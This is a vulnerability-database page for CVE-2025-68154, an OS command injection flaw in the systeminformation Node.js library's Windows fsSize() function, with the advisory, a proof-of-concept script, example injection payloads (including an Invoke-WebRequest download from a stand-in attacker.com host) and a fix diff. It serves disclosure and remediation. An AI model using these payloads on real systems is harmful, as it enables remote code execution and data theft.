cvelistv5 - cve-2025-68154

CVE-2025-68154 (GCVE-0-2025-68154)

Vulnerability from cvelistv5

Published

2025-12-16 18:18

Modified

2025-12-17 18:50

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Summary

systeminformation is a System and OS information library for node.js. In versions prior to 5.27.14, the `fsSize()` function in systeminformation is vulnerable to OS command injection on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function. The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable. Version 5.27.14 contains a patch.

References

URL

Tags

	security-advisories@github.com	https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68
	security-advisories@github.com	https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch

Impacted products

	Vendor	Product	Version
	sebhildebrandt	systeminformation	Version: < 5.27.14

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-68154",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-17T14:50:36.446709Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-17T18:50:42.535Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "systeminformation",
          "vendor": "sebhildebrandt",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 5.27.14"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "systeminformation is a System and OS information library for node.js. In versions prior to 5.27.14, the `fsSize()` function in systeminformation is vulnerable to OS command injection on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function. The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable. Version 5.27.14 contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-16T18:18:03.640Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch"
        },
        {
          "name": "https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68"
        }
      ],
      "source": {
        "advisory": "GHSA-wphj-fx3q-84ch",
        "discovery": "UNKNOWN"
      },
      "title": "Command Injection in fsSize() on Windows"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-68154",
    "datePublished": "2025-12-16T18:18:03.640Z",
    "dateReserved": "2025-12-15T23:02:17.603Z",
    "dateUpdated": "2025-12-17T18:50:42.535Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-68154\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-16T19:16:00.257\",\"lastModified\":\"2025-12-18T15:08:06.237\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"systeminformation is a System and OS information library for node.js. In versions prior to 5.27.14, the `fsSize()` function in systeminformation is vulnerable to OS command injection on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function. The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable. Version 5.27.14 contains a patch.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"references\":[{\"url\":\"https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"Command Injection in fsSize() on Windows\", \"source\": {\"advisory\": \"GHSA-wphj-fx3q-84ch\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"sebhildebrandt\", \"product\": \"systeminformation\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 5.27.14\"}]}], \"references\": [{\"url\": \"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch\", \"name\": \"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68\", \"name\": \"https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"systeminformation is a System and OS information library for node.js. In versions prior to 5.27.14, the `fsSize()` function in systeminformation is vulnerable to OS command injection on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function. The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable. Version 5.27.14 contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-16T18:18:03.640Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-68154\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-17T14:50:36.446709Z\"}}}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2025-12-17T14:52:48.704Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-68154\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-16T18:18:03.640Z\", \"dateReserved\": \"2025-12-15T23:02:17.603Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-16T18:18:03.640Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

ghsa-wphj-fx3q-84ch

Vulnerability from github

Published

2025-12-16 22:37

Modified

2025-12-16 22:37

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

systeminformation has a Command Injection vulnerability in fsSize() function on Windows

Details

Summary

The fsSize() function in systeminformation is vulnerable to OS Command Injection (CWE-78) on Windows systems. The optional drive parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function.

Affected Platforms: Windows only

CVSS Breakdown: - Attack Vector (AV:N): Network - if used in a web application/API - Attack Complexity (AC:H): High - requires application to pass user input to fsSize() - Privileges Required (PR:N): None - no authentication required at library level - User Interaction (UI:N): None - Scope (S:U): Unchanged - executes within Node.js process context - Confidentiality/Integrity/Availability (C:H/I:H/A:H): High impact if exploited

Note: The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to fsSize(), it is not vulnerable.

Details

Vulnerable Code Location

File: lib/filesystem.js, Line 197

javascript if (_windows) { try { const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`; util.powerShell(cmd).then((stdout, error) => {

The drive parameter is concatenated directly into the PowerShell command string without any sanitization.

Why This Is a Vulnerability

This is inconsistent with the security pattern used elsewhere in the codebase. Other functions properly sanitize user input using util.sanitizeShellString():

| File | Line | Function | Sanitization | |------|------|----------|--------------| | lib/processes.js | 141 | services() | ✅ util.sanitizeShellString(srv) | | lib/processes.js | 1006 | processLoad() | ✅ util.sanitizeShellString(proc) | | lib/network.js | 1253 | networkStats() | ✅ util.sanitizeShellString(iface) | | lib/docker.js | 472 | dockerContainerStats() | ✅ util.sanitizeShellString(containerIDs, true) | | lib/filesystem.js | 197 | fsSize() | ❌ No sanitization |

The sanitizeShellString() function (defined at lib/util.js:731) removes dangerous characters like ;, &, |, $, `, #, etc., which would prevent command injection.

PoC

Attack Scenario

An application exposes disk information via an API and passes user input to si.fsSize():

```javascript // Vulnerable application example const si = require('systeminformation'); const http = require('http'); const url = require('url');

http.createServer(async (req, res) => { const parsedUrl = url.parse(req.url, true); const drive = parsedUrl.query.drive; // User-controlled input

// VULNERABLE: User input passed directly to fsSize() const diskInfo = await si.fsSize(drive);

res.end(JSON.stringify(diskInfo)); }).listen(3000); ```

Exploitation

Normal Request: GET /api/disk?drive=C:

Malicious Request (Command Injection): GET /api/disk?drive=C:;%20whoami%20%23

Command Construction Demonstration

The following demonstrates how commands are constructed with malicious input:

Normal usage: Input: "C:" Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

With injection payload C:; whoami #: Input: "C:; whoami #" Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl ↑ ↑ semicolon terminates # comments out rest first command

PowerShell will execute: 1. Get-WmiObject Win32_logicaldisk | ... | where -property Caption -eq C: (original command) 2. whoami (injected command) 3. Everything after # is commented out

PoC Script

```javascript /* * Command Injection PoC - systeminformation fsSize() * * Run with: node poc.js * Requires: npm install systeminformation /

const os = require('os');

// Simulates the vulnerable command construction from filesystem.js:197 function simulateVulnerableCommand(drive) { const cmd = Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl; return cmd; }

// Test payloads const payloads = [ { name: 'Normal', input: 'C:' }, { name: 'Command Execution', input: 'C:; whoami #' }, { name: 'Data Exfiltration', input: 'C:; Get-Process | Out-File C:\temp\procs.txt #' }, { name: 'Remote Payload', input: 'C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe #' }, ];

console.log('=== Command Injection PoC ===\n'); console.log(Platform: ${os.platform()}); console.log(Note: Actual exploitation requires Windows\n);

payloads.forEach(p => { console.log([${p.name}]); console.log(Input: ${p.input}); console.log(Command: ${simulateVulnerableCommand(p.input)}\n); }); ```

PoC Output

``` === Command Injection PoC ===

Platform: win32 Note: Actual exploitation requires Windows

[Normal] Input: C: Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

[Command Execution] Input: C:; whoami # Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl

[Remote Payload] Input: C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe # Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe # | fl ```

As shown, the attacker's commands are injected directly into the PowerShell command string.

Impact

Who Is Affected?

Applications running systeminformation on Windows that pass user-controlled input to fsSize(drive)
Web applications, APIs, or CLI tools that accept drive letters from users
Monitoring dashboards that allow users to specify which drives to query

Potential Attack Scenarios

Remote Code Execution (RCE) - Execute arbitrary commands with Node.js process privileges
Data Exfiltration - Read sensitive files and exfiltrate data
Privilege Escalation - If Node.js runs with elevated privileges
Lateral Movement - Use the compromised system to attack internal network
Ransomware Deployment - Download and execute malicious payloads

Recommended Fix

Apply util.sanitizeShellString() to the drive parameter, consistent with other functions in the codebase:

diff if (_windows) { try { + const driveSanitized = drive ? util.sanitizeShellString(drive, true) : ''; - const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`; + const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${driveSanitized ? '| where -property Caption -eq ' + driveSanitized : ''} | fl`; util.powerShell(cmd).then((stdout, error) => {

The true parameter enables strict mode which removes additional characters like spaces and parentheses.

systeminformation thanks developers working on the project. The Systeminformation Project hopes this report helps improve the its security. Please systeminformation know if any additional information or clarification is needed.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "systeminformation"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.27.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68154"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-16T22:37:23Z",
    "nvd_published_at": "2025-12-16T19:16:00Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `fsSize()` function in `systeminformation` is vulnerable to **OS Command Injection (CWE-78)** on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function.\n\n**Affected Platforms:** Windows only  \n\n**CVSS Breakdown:**\n- **Attack Vector (AV:N):** Network - if used in a web application/API\n- **Attack Complexity (AC:H):** High - requires application to pass user input to `fsSize()`\n- **Privileges Required (PR:N):** None - no authentication required at library level\n- **User Interaction (UI:N):** None\n- **Scope (S:U):** Unchanged - executes within Node.js process context\n- **Confidentiality/Integrity/Availability (C:H/I:H/A:H):** High impact if exploited\n\n\u003e **Note:** The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable.\n\n---\n\n## Details\n\n### Vulnerable Code Location\n\n**File:** `lib/filesystem.js`, **Line 197**\n\n```javascript\nif (_windows) {\n  try {\n    const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? \u0027| where -property Caption -eq \u0027 + drive : \u0027\u0027} | fl`;\n    util.powerShell(cmd).then((stdout, error) =\u003e {\n```\n\nThe `drive` parameter is concatenated directly into the PowerShell command string without any sanitization.\n\n### Why This Is a Vulnerability\n\nThis is inconsistent with the security pattern used elsewhere in the codebase. Other functions properly sanitize user input using `util.sanitizeShellString()`:\n\n| File | Line | Function | Sanitization |\n|------|------|----------|--------------|\n| `lib/processes.js` | 141 | `services()` | \u2705 `util.sanitizeShellString(srv)` |\n| `lib/processes.js` | 1006 | `processLoad()` | \u2705 `util.sanitizeShellString(proc)` |\n| `lib/network.js` | 1253 | `networkStats()` | \u2705 `util.sanitizeShellString(iface)` |\n| `lib/docker.js` | 472 | `dockerContainerStats()` | \u2705 `util.sanitizeShellString(containerIDs, true)` |\n| `lib/filesystem.js` | 197 | `fsSize()` | \u274c **No sanitization** |\n\nThe `sanitizeShellString()` function (defined at `lib/util.js:731`) removes dangerous characters like `;`, `\u0026`, `|`, `$`, `` ` ``, `#`, etc., which would prevent command injection.\n\n---\n\n## PoC\n\n### Attack Scenario\n\nAn application exposes disk information via an API and passes user input to `si.fsSize()`:\n\n```javascript\n// Vulnerable application example\nconst si = require(\u0027systeminformation\u0027);\nconst http = require(\u0027http\u0027);\nconst url = require(\u0027url\u0027);\n\nhttp.createServer(async (req, res) =\u003e {\n  const parsedUrl = url.parse(req.url, true);\n  const drive = parsedUrl.query.drive; // User-controlled input\n  \n  // VULNERABLE: User input passed directly to fsSize()\n  const diskInfo = await si.fsSize(drive);\n  \n  res.end(JSON.stringify(diskInfo));\n}).listen(3000);\n```\n\n### Exploitation\n\n**Normal Request:**\n```\nGET /api/disk?drive=C:\n```\n\n**Malicious Request (Command Injection):**\n```\nGET /api/disk?drive=C:;%20whoami%20%23\n```\n\n### Command Construction Demonstration\n\nThe following demonstrates how commands are constructed with malicious input:\n\n**Normal usage:**\n```\nInput: \"C:\"\nCommand: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl\n```\n\n**With injection payload `C:; whoami #`:**\n```\nInput: \"C:; whoami #\"\nCommand: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl\n                                                                                                                            \u2191         \u2191\n                                                                                                            semicolon terminates    # comments out rest\n                                                                                                            first command\n```\n\nPowerShell will execute:\n1. `Get-WmiObject Win32_logicaldisk | ... | where -property Caption -eq C:` (original command)\n2. `whoami` (injected command)\n3. Everything after `#` is commented out\n\n### PoC Script\n\n```javascript\n/**\n * Command Injection PoC - systeminformation fsSize()\n * \n * Run with: node poc.js\n * Requires: npm install systeminformation\n */\n\nconst os = require(\u0027os\u0027);\n\n// Simulates the vulnerable command construction from filesystem.js:197\nfunction simulateVulnerableCommand(drive) {\n  const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? \u0027| where -property Caption -eq \u0027 + drive : \u0027\u0027} | fl`;\n  return cmd;\n}\n\n// Test payloads\nconst payloads = [\n  { name: \u0027Normal\u0027, input: \u0027C:\u0027 },\n  { name: \u0027Command Execution\u0027, input: \u0027C:; whoami #\u0027 },\n  { name: \u0027Data Exfiltration\u0027, input: \u0027C:; Get-Process | Out-File C:\\\\temp\\\\procs.txt #\u0027 },\n  { name: \u0027Remote Payload\u0027, input: \u0027C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\\\temp\\\\shell.exe #\u0027 },\n];\n\nconsole.log(\u0027=== Command Injection PoC ===\\n\u0027);\nconsole.log(`Platform: ${os.platform()}`);\nconsole.log(`Note: Actual exploitation requires Windows\\n`);\n\npayloads.forEach(p =\u003e {\n  console.log(`[${p.name}]`);\n  console.log(`  Input: ${p.input}`);\n  console.log(`  Command: ${simulateVulnerableCommand(p.input)}\\n`);\n});\n```\n\n### PoC Output\n\n```\n=== Command Injection PoC ===\n\nPlatform: win32\nNote: Actual exploitation requires Windows\n\n[Normal]\n  Input: C:\n  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl\n\n[Command Execution]\n  Input: C:; whoami #\n  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl\n\n[Data Exfiltration]\n  Input: C:; Get-Process | Out-File C:\\temp\\procs.txt #\n  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Get-Process | Out-File C:\\temp\\procs.txt # | fl\n\n[Remote Payload]\n  Input: C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\temp\\shell.exe #\n  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\temp\\shell.exe # | fl\n```\n\nAs shown, the attacker\u0027s commands are injected directly into the PowerShell command string.\n\n---\n\n## Impact\n\n### Who Is Affected?\n\n- Applications running `systeminformation` on **Windows** that pass user-controlled input to `fsSize(drive)`\n- Web applications, APIs, or CLI tools that accept drive letters from users\n- Monitoring dashboards that allow users to specify which drives to query\n\n### Potential Attack Scenarios\n\n1. **Remote Code Execution (RCE)** - Execute arbitrary commands with Node.js process privileges\n2. **Data Exfiltration** - Read sensitive files and exfiltrate data\n3. **Privilege Escalation** - If Node.js runs with elevated privileges\n4. **Lateral Movement** - Use the compromised system to attack internal network\n5. **Ransomware Deployment** - Download and execute malicious payloads\n\n---\n\n## Recommended Fix\n\nApply `util.sanitizeShellString()` to the `drive` parameter, consistent with other functions in the codebase:\n\n```diff\n  if (_windows) {\n    try {\n+     const driveSanitized = drive ? util.sanitizeShellString(drive, true) : \u0027\u0027;\n-     const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? \u0027| where -property Caption -eq \u0027 + drive : \u0027\u0027} | fl`;\n+     const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${driveSanitized ? \u0027| where -property Caption -eq \u0027 + driveSanitized : \u0027\u0027} | fl`;\n      util.powerShell(cmd).then((stdout, error) =\u003e {\n```\n\nThe `true` parameter enables strict mode which removes additional characters like spaces and parentheses.\n\n---\n\n`systeminformation` thanks developers working on the project. The Systeminformation Project hopes this report helps improve the its security. Please systeminformation know if any additional information or clarification is needed.",
  "id": "GHSA-wphj-fx3q-84ch",
  "modified": "2025-12-16T22:37:23Z",
  "published": "2025-12-16T22:37:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68154"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sebhildebrandt/systeminformation"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "systeminformation has a Command Injection vulnerability in fsSize() function on Windows"
}

fkie_cve-2025-68154

Vulnerability from fkie_nvd

Published

2025-12-16 19:16

Modified

2025-12-18 15:08

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68
	security-advisories@github.com	https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "systeminformation is a System and OS information library for node.js. In versions prior to 5.27.14, the `fsSize()` function in systeminformation is vulnerable to OS command injection on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function. The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable. Version 5.27.14 contains a patch."
    }
  ],
  "id": "CVE-2025-68154",
  "lastModified": "2025-12-18T15:08:06.237",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-16T19:16:00.257",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-68154 (GCVE-0-2025-68154)

Vulnerability from cvelistv5

ghsa-wphj-fx3q-84ch

Vulnerability from github

Summary

Details

Vulnerable Code Location

Why This Is a Vulnerability

PoC

Attack Scenario

Exploitation

Command Construction Demonstration

PoC Script

PoC Output

Impact

Who Is Affected?

Potential Attack Scenarios

Recommended Fix

fkie_cve-2025-68154

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature